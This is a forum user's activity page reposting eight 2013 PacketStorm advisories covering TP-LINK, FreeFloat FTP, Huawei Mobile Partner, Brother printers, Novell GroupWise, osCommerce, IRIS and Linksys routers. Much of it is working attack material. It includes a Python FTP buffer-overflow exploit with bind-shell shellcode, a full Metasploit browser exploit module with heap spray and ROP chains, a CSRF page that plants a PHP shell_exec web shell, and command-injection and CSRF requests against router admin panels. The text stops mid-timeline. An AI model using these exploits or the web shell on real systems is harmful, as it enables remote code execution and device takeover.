Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    TP-LINK Admin Panel Multiple CSRF Vulnerabilities Advisory Name: Multiple Cross Site Request Forgery vulnerabilities in TP-LINK Admin Panel Internal Cybsec Advisory Id: 2013-0208-Multiple CSRF vulnerabilities in TP-LINK Vulnerability Class: Cross Site Request Forgery (CSRF) Release Date: 02/08/2013 Affected Applications: Firmware v3.13.6 Build 110923 Rel.53137n; other versions may also be affected. Affected Platforms: WR2543ND or any running the vulnerable firmware. Local / Remote: Remote Severity: Medium ? CVSS: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) Researcher: Juan Manuel Garcia Vendor Status: Acknowedged / Unpatched Release Mode: User released Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: Multiple Cross Site Request Forgery vulnerabilities were found in TP-LINK Admin Panel, because the application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Proof of Concepts: 1) New Storage Sharing and FTP Server user: http://server/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save 2) Disable the Router's Stateful Inspection Firewall: http://server/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save Impact: An affected user may unintentionally execute actions written by an attacker. In addition, an attacker may change router settings or gain unauthorized access Vendor Response: 2012-10-10 ? Vulnerability is identified. 2012-10-11 ? Vendor is contacted. 2012-10-12 ? Vulnerability details are sent to vendor. 2012-10-17 ? Vendor confirms vulnerability and states ?This vulnerability has been escalated to our RD engineer but under current web server framework it is hard to fix. Our engineer team will modify the web server framework to fix this. Currently it is under process but will take time?. 2012-10-25 ? Cybsec asks the vendor for the planned publication date for the update. 2012-10-26 ? Vendor states ?I have no detailed schedule yet?. 2012-12-12 ? Cybsec asks if there are any news regarding the solution of reported vulnerabilities. 2012-12-12 ? Vendor states ?The fix of this reported vulnerability is not included in the last firmware upgrade because the web server framework change is still under development?. 2013-02-01 ? Cybsec tells the Vendor that the security advisory will be published on Wednesday February 6. 2013-02-08 ? Having received no reply from TP-Link, vulnerability is released. Contact Information: For more information regarding the vulnerability feel free to contact the researcher at jmgarcia <at> cybsec <dot> com About CYBSEC S.A. Security Systems Since 1996, CYBSEC is engaged exclusively in rendering professional services specialized in Information Security. Their area of services covers Latin America, Spain and over 250 customers are a proof of their professional life. To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange. For more information, please visit www.cybsec.com (c) 2010 - CYBSEC S.A. Security Systems Source: TP-LINK Admin Panel Multiple CSRF Vulnerabilities
  2. Praetorian503
    FreeFloat FTP 1.0 Raw Commands Buffer Overflow #!/usr/bin/env python # Exploit Title: FreeFloat FTP raw commands buffer overflow # Date: 10 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.freefloat.com/ # Version: FreeFloat FTP 1.0 # Tested on: Windows XP Pro SP2, English # # Description: # FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and # execute arbitrary code when a long and invalid raw command is sent to it. # import socket, struct, sys if len(sys.argv) < 3: print "usage: %s IP port" % (sys.argv[0]) sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) # Bind shellcode generated with msfvenom: # msfvenom -p windows/shell_bind_tcp # -b "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d" # -e x86/fnstenv_mov # # [*] x86/fnstenv_mov succeeded with size 366 (iteration=1) shellcode = ( "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc8" + "\x4c\xab\x8c\x83\xeb\xfc\xe2\xf4\x34\xa4\x22\x8c\xc8\x4c" + "\xcb\x05\x2d\x7d\x79\xe8\x43\x1e\x9b\x07\x9a\x40\x20\xde" + "\xdc\xc7\xd9\xa4\xc7\xfb\xe1\xaa\xf9\xb3\x9a\x4c\x64\x70" + "\xca\xf0\xca\x60\x8b\x4d\x07\x41\xaa\x4b\x2a\xbc\xf9\xdb" + "\x43\x1e\xbb\x07\x8a\x70\xaa\x5c\x43\x0c\xd3\x09\x08\x38" + "\xe1\x8d\x18\x1c\x20\xc4\xd0\xc7\xf3\xac\xc9\x9f\x48\xb0" + "\x81\xc7\x9f\x07\xc9\x9a\x9a\x73\xf9\x8c\x07\x4d\x07\x41" + "\xaa\x4b\xf0\xac\xde\x78\xcb\x31\x53\xb7\xb5\x68\xde\x6e" + "\x90\xc7\xf3\xa8\xc9\x9f\xcd\x07\xc4\x07\x20\xd4\xd4\x4d" + "\x78\x07\xcc\xc7\xaa\x5c\x41\x08\x8f\xa8\x93\x17\xca\xd5" + "\x92\x1d\x54\x6c\x90\x13\xf1\x07\xda\xa7\x2d\xd1\xa0\x7f" + "\x99\x8c\xc8\x24\xdc\xff\xfa\x13\xff\xe4\x84\x3b\x8d\x8b" + "\x37\x99\x13\x1c\xc9\x4c\xab\xa5\x0c\x18\xfb\xe4\xe1\xcc" + "\xc0\x8c\x37\x99\xfb\xdc\x98\x1c\xeb\xdc\x88\x1c\xc3\x66" + "\xc7\x93\x4b\x73\x1d\xc5\x6c\xbd\x13\x1f\xc3\x8e\xc8\x5d" + "\xf7\x05\x2e\x26\xbb\xda\x9f\x24\x69\x57\xff\x2b\x54\x59" + "\x9b\x1b\xc3\x3b\x21\x74\x54\x73\x1d\x1f\xf8\xdb\xa0\x38" + "\x47\xb7\x29\xb3\x7e\xdb\x41\x8b\xc3\xf9\xa6\x01\xca\x73" + "\x1d\x24\xc8\xe1\xac\x4c\x22\x6f\x9f\x1b\xfc\xbd\x3e\x26" + "\xb9\xd5\x9e\xae\x56\xea\x0f\x08\x8f\xb0\xc9\x4d\x26\xc8" + "\xec\x5c\x6d\x8c\x8c\x18\xfb\xda\x9e\x1a\xed\xda\x86\x1a" + "\xfd\xdf\x9e\x24\xd2\x40\xf7\xca\x54\x59\x41\xac\xe5\xda" + "\x8e\xb3\x9b\xe4\xc0\xcb\xb6\xec\x37\x99\x10\x7c\x7d\xee" + "\xfd\xe4\x6e\xd9\x16\x11\x37\x99\x97\x8a\xb4\x46\x2b\x77" + "\x28\x39\xae\x37\x8f\x5f\xd9\xe3\xa2\x4c\xf8\x73\x1d\x4c" + "\xab\x8c" ) # EIP overwritten at offset 251 # JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English jmpesp = struct.pack("<I", 0x7CA58265) buf = "\x41" * 251 + jmpesp + "\x90" * 129 + shellcode print "[+] exploiting target %s:%d" % (ip, port) print "[+] try connecting to %s on port 4444" % (ip) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.recv(1024) s.send(buf + "\r\n") Source: FreeFloat FTP 1.0 Raw Commands Buffer Overflow
  3. Praetorian503
    The Huawei Mobile Partner application suffers from having extremely loose access permissions allowing for anyone to replace the files with malicious binaries. Version 23.007.09.00.203 is affected. 1. DESCRIPTION Huawei Mobile Partner application contains a flaw that may allow an attacker to gain access to unauthorized privileges. The issue is due to the application installing with insecure permissions. This allows a less privileged local attacker or compromised process to replace the original application binary with a malicious application which will be executed by a victim user or upon Mobile Partner application Windows service restart. 2. BACKGROUND Mobile Partner is a built-in application in Huawei 3G USB modems that allow you to connect to the 3G mobile network for Internet access. It is widely used by many telcos round the world. 3. VERSIONS AFFECTED Tested version: 23.007.09.00.203. 4. PROOF-OF-CONCEPT/EXPLOIT //// Tested on Windows c:\>wmic service get pathname | find "Mobile Partner" C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe" C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe RW Everyone RW BUILTIN\Users c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe" C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe RW Everyone RW BUILTIN\Users c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe" C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe RW Everyone RW BUILTIN\Users /// Tested on Mac YEHG:MacOS tester$ ls -Rl /Applications/Mobile\ Partner.app/ | grep rwxrwxrwx | grep "\(app\|mobilepartner\)" -rwxrwxrwx 1 root admin 82496 Oct 6 17:34 mobilepartner drwxrwxrwx 3 root admin 102 Oct 6 17:34 XStartScreen.app drwxrwxrwx 3 root admin 102 Oct 6 17:34 LiveUpd.app drwxrwxrwx 3 root admin 102 Oct 6 17:34 ouc.app 5. SOLUTION The vendor has not responded to our security report for months. Workaround is to remove WRITE attribute permission on all Mobile Partner executable files for non-administrator and non-system accounts. 6. VENDOR Huawei Technologies Co.,Ltd 7. CREDIT Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 2012-10-xx: Contacted the vendor through publicly mentioned emails and forums 2013-02-11: No response 2013-02-11: Vulnerability not fixed 2013-02-11: Vulnerability disclosed 9. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission #yehg [2013-02-11] Source: PacketStorm
  4. Praetorian503
    Brother HL5370 printers suffer from arbitrary command execution and trivial password guessing. Tested on Brother HL5370 latest firmware so far, confirmed working against many others by Brother documentation >From Brother .de website - http://qr.cx/zCt9 Syntax for PJL JOB command includes - "PASSWORD = password ( HL-1660e/2060/2400C/2400Ce/3400CN/1650/1670N/3260N/2460/7050/ 1850/1870N/5040/5050/5070N/5140/5150D/5170DN/2600CN/2700CN/3450CN/6050/6050D/6050DN/805 0N only ) When the password is set by the DEFAULT command, modifying the NVRAM by using the DEFAULT or INITIALIZE commands is locked with the password. Sending the correct password with this command can unlock this until the EOJ command is executed. password = 0 to 65,535 Default value = 0 When the printer receives the JOB command, the UEL command is not recognized as a job boundary until an EOJ command is received." Guessing 16-bit password is very fast, and printer does not or can not? slow down password guessing. Worse, password is easily found or not necessary. from printer ROM "image" header - 12345X@PJL SUPERUSER PASSWORD=[any 16-bit sign value] @PJL DEFAULT LANGSELECT=1 @PJL SUPERUSEROFF @PJL SUPERUSER PASSWORD=[any 16-bit sign value] @PJL WNVRAMBIT ADDRESS=288161793 DATA=1 @PJL SUPERUSEROFF @PJL SET PAGEPROTECT=OFF @PJL ENTER LANGUAGE=PCL --> binary begins here Have not tested past uploading arbitrary firm ware. This should be enough to worry. Probably no point to Brother network controller supporting https and snmp 3 now... Brother snmp 3 support only short keys any way. Source: PacketStorm
  5. Praetorian503
    This Metasploit module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows to read arbitrary memory and execute arbitrary code. This Metasploit module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The JRE6 needs to be installed to achieve ASLR bypass. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "9.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking, :classid => "{601D7813-408F-11D1-98D7-444553540000}", :method => "SetEngine" }) def initialize(info={}) super(update_info(info, 'Name' => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows to read arbitrary memory and execute arbitrary code. This module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The JRE6 needs to be installed to achieve ASLR bypass. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0439' ], [ 'OSVDB', '89700' ], [ 'BID' , '57658' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ] ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 1040, 'DisableNops' => true }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # gwcls1.dll 12.0.0.8586 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3ed' } ]#'0x5fe' } ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c case my_target when targets[7] # IE 9 on Windows 7 js = %Q| function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{js_code}"); var nops = unescape("#{js_random_nops}"); while (nops.length < 0x80000) nops += nops; var offset_length = #{my_target['Offset']}; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } | else # For IE 6, 7, 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | end js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string rop_payload << jmp_shell rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset rop_payload << [0x77c15ed5].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret rop_payload << stack_pivot rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string rop_payload << jmp_shell rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset rop_payload << [0x7C348B05].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret rop_payload << stack_pivot rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200 html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'> </object> <script> target.SetEngine(0x0c0c0c0c-0x20); setInterval(function(){#{trigger}},1000); </script> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin * Remote Code Exec (240.8d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll - eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58 eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d: 10335e2d 8a8e4f040000 mov cl,byte ptr [esi+44Fh] ds:0023:0c0c103b=?? .text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 .text:103BDDEF test esi, esi .text:103BDDF1 jnz short loc_103BDE17 .text:103BDDF3 cmp [eax+426h], esi .text:103BDDF9 jz short loc_103BDE17 // Check function pointer against nil? .text:103BDDFB mov ecx, [ebp+arg_8] .text:103BDDFE mov edx, [ebp+arg_4] .text:103BDE01 push ecx .text:103BDE02 mov ecx, [eax+42Ah] // Carefully crafted object allows to control it .text:103BDE08 push edx .text:103BDE09 mov edx, [eax+426h] // Carefully crafted object allows to control it .text:103BDE0F push ecx .text:103BDE10 call edx // Win! * Info Leak // Memory disclosure => 4 bytes from an arbitrary address // Unstable when info leaking and triggering rce path... target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll var leak = target.GetMiscAccess(); alert(leak); =end Source: PacketStorm
  6. Praetorian503
    osCommerce version 2.3.3 suffers from a cross site request forgery vulnerability. <?php /* * this is simple proof-of-c0ncept for csrf in latest osCommerce (2.3.3). * * Admin, after visiting this page, will add php-shell-code to file: * ./catalog/includes/languages/english/download.php, so now if we * add 'cmd' param to this file, our 'shell' will print command output. * * --- there should be more this kind of bugs in this webapp. * 22.o1.2o13 o/ */ ?> <html><body onload="document.runCSRF.submit();"> <form method="post" name="runCSRF" action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save"> <input type="hidden" name="file_contents" value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>"> </form>your shell should be here: catalog/includes/languages/english/download.php?cmd=id<br></body></html> Source: PacketStorm
  7. Praetorian503
    IRIS Citations management tool suffers from a remote command execution vulnerability. A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands. Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ PoC: http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||" ~ aeon Source: PacketStorm
  8. Praetorian503
    Linksys E1500 and E2500 suffer from cross site request forgery, cross site scripting, remote command injection, and directory traversal vulnerabilities. Device Name: Linksys E1500 / E2500 Vendor: Linksys ============ Device Description: ============ The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page. Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=... ============ Vulnerable Firmware Releases - e1500: ============ Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011 Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012 Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012 ============ Vulnerable Firmware Releases - e2500: ============ Firmware Version: v1.0.03 (only tested for known OS command injection) Other versions may also be affected. ============ Shodan Torks ============ Shodan Search: linksys e1500 Shodan Search: linksys e2500 ============ Vulnerability Overview: ============ * OS Command Injection / E1500 and E2500 v1.0.03 => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26 The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Diagnostics.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 185 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip= Change the request methode from HTTP Post to HTTP GET makes the exploitation easier: http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png * Directory traversal - tested on E1500: => parameter: next_page Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device. Request: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version Response: HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png * For changing the current password there is no request of the current password - tested on E1500 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. Example Request: POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * Reflected Cross Site Scripting - tested on E1500 => Parameter: wait_time=3'%3balert('pwnd')// Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300 submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png * Redirection - tested on E1500 => Paramter: submit_button=http://www.pwnd.pwnd%0a Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290 submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-004 Twitter: @s3cur1ty_de ============ Time Line: ============ October 2012 - discovered vulnerability 21.10.2012 - contacted Linksys with vulnerability details 23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1 27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1 27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1 29.10.2012 - Linksys responded with case number 13.11.2012 - /me requested update of the progress 15.11.2012 - Linksys sends Beta Agreement 16.11.2012 - Linksys sends the Beta Firmware for testing 16.11.2012 